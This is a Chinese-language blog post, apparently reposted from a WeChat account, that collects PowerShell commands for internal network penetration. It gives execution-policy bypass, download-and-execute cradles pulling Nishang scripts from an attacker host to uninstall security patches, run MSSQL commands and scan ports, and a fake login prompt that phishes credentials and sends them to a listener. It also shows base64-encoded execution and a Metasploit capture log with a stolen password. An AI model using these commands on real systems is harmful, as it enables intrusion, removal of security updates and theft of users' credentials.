一些内网渗透所用Poweshell脚本(一)

  • A+
所属分类:安全文章

利用powershell下载一个文件:

powershell (new-object System.Net.WebClient).DownloadFile('http://down.360safe.com/360/inst.exe','d:\test\360.exe')


默认情况下,powershell不允许直接执行ps1脚本,但是使用如下的语句:

可以绕过策略限制,直接执行一个ps1的脚本。5 k4 e7 ^9 l* ?, b-p: b4 ?

PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1


powershell webshellASPX马:

https://github.com/samratashok/nishang/tree/master/Antak-WebShell


删除补丁

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Escalation/Remove-Update.ps1'); Remove-Update All"       //删除全部补丁


powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Escalation/Remove-Update.ps1'); Remove-Update KB2761226"       //删除指定补丁


powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Escalation/Remove-Update.ps1'); Remove-Update Security"       //删除安全更新


执行mssql命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Execution/Execute-Command-MSSQL.ps1');  Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234"


检查是否虚拟机:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Check-VM.ps1'); Check-VM"


Invoke-CredentialsPhish:

诱骗用户以纯文本格式提供凭据。(欺骗用户输入登录帐号密码,错误密码是继续输入的,关都关不掉的那种    )

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish"


一些内网渗透所用Poweshell脚本(一)

扫描内网IP端口

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/FireBuster.ps1'); FireBuster 192.168.4.1 1000-1020 -Verbose"

一些内网渗透所用Poweshell脚本(一)

Powershell基础认证钓鱼与捕获

脚本

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $wc = new-object net.webclient; $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)"); $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, ''); $result = $wc.downloadstring('https://192.168.1.1');//监听IP
cat power.txt | iconv --to-code UTF-16LE | base64

转化为base64

powershell -ep bypass -enc <上述加密代码>
一些内网渗透所用Poweshell脚本(一)
msf使用

auxiliary/server/capture/http_basic 
msf auxiliary(http_basic) > set SSL true SSL => true msf auxiliary(http_basic) > set SRVPORT 443 SRVPORT => 443 msf auxiliary(http_basic) > set URIPATH / URIPATH => / msf auxiliary(http_basic) > run
[+] 192.168.1.102 - Credential collected: "SITTINGDUCKuser:admin888" => /

即能截取密码。

本文始发于微信公众号(关注安全技术):一些内网渗透所用Poweshell脚本(一)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: